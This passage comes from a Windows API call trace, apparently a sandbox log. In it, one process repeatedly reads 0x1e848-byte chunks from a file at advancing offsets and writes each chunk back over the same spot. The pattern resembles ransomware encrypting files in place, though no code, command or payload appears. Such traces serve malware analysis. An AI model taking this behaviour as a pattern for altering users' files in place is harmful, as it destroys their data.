| out: hHeap=0x500000) returned 1 [0114.190] GetProcessHeap () returned 0x500000 [0114.190] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.190] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2b275d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.190] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.201] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2b275d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.201] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.201] GetProcessHeap () returned 0x500000 [0114.202] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.202] GetProcessHeap () returned 0x500000 [0114.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.202] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2b64660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.202] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.212] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2b64660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.212] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.212] GetProcessHeap () returned 0x500000 [0114.212] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.212] GetProcessHeap () returned 0x500000 [0114.212] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.212] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2ba16f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.213] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.223] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2ba16f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.223] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.224] GetProcessHeap () returned 0x500000 [0114.224] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.224] GetProcessHeap () returned 0x500000 [0114.224] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.224] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2bde780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.224] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.238] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2bde780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.238] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.239] GetProcessHeap () returned 0x500000 [0114.239] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.239] GetProcessHeap () returned 0x500000 [0114.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.239] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2c1b810, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.239] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.258] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2c1b810, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.258] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.258] GetProcessHeap () returned 0x500000 [0114.258] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.258] GetProcessHeap () returned 0x500000 [0114.258] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.258] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2c588a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.258] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.269] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2c588a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.269] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.270] GetProcessHeap () returned 0x500000 [0114.270] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.270] GetProcessHeap () returned 0x500000 [0114.270] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.270] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2c95930, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.270] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.286] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2c95930, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.286] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.287] GetProcessHeap () returned 0x500000 [0114.287] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.287] GetProcessHeap () returned 0x500000 [0114.287] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.287] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2cd29c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.287] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.298] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2cd29c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.298] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.298] GetProcessHeap () returned 0x500000 [0114.298] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.299] GetProcessHeap () returned 0x500000 [0114.299] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.299] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2d0fa50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.299] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.316] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2d0fa50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.316] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.316] GetProcessHeap () returned 0x500000 [0114.316] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.316] GetProcessHeap () returned 0x500000 [0114.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.317] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2d4cae0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.317] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.357] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2d4cae0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.357] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.358] GetProcessHeap () returned 0x500000 [0114.358] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.358] GetProcessHeap () returned 0x500000 [0114.358] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.358] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2d89b70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.358] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.368] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2d89b70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.368] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.369] GetProcessHeap () returned 0x500000 [0114.369] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.369] GetProcessHeap () returned 0x500000 [0114.369] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.369] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2dc6c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.369] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.380] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2dc6c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.380] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.381] GetProcessHeap () returned 0x500000 [0114.381] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.381] GetProcessHeap () returned 0x500000 [0114.381] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.381] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e03c90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.381] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.397] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e03c90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.397] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.403] GetProcessHeap () returned 0x500000 [0114.403] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.403] GetProcessHeap () returned 0x500000 [0114.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.403] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e40d20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.403] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.419] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e40d20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.419] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.419] GetProcessHeap () returned 0x500000 [0114.419] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.419] GetProcessHeap () returned 0x500000 [0114.419] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.420] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e7ddb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.420] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.428] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e7ddb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.428] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.429] GetProcessHeap () returned 0x500000 [0114.429] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.429] GetProcessHeap () returned 0x500000 [0114.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.429] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2ebae40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.429] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.446] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2ebae40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.446] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.447] GetProcessHeap () returned 0x500000 [0114.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.447] GetProcessHeap () returned 0x500000 [0114.447] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.447] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2ef7ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.447] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.470] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2ef7ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.470] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.471] GetProcessHeap () returned 0x500000 [0114.471] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.471] GetProcessHeap () returned 0x500000 [0114.471] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.471] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2f34f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.472] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.481] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2f34f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.481] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.482] GetProcessHeap () returned 0x500000 [0114.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.482] GetProcessHeap () returned 0x500000 [0114.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.482] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2f71ff0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.482] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.674] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2f71ff0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.674] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.674] GetProcessHeap () returned 0x500000 [0114.674] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.674] GetProcessHeap () returned 0x500000 [0114.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.674] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2faf080, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.675] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.193] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2faf080, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.193] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.194] GetProcessHeap () returned 0x500000 [0115.194] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.194] GetProcessHeap () returned 0x500000 [0115.194] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.194] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2fec110, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.194] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.440] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2fec110, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.440] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.442] GetProcessHeap () returned 0x500000 [0115.442] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.442] GetProcessHeap () returned 0x500000 [0115.442] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.442] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x30291a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.442] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.515] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x30291a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.515] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0115.515] GetProcessHeap () returned 0x500000 [0115.516] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0115.516] GetProcessHeap () returned 0x500000 [0115.516] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0115.516] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3066230, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.516] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0115.573] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3066230, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.573] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, 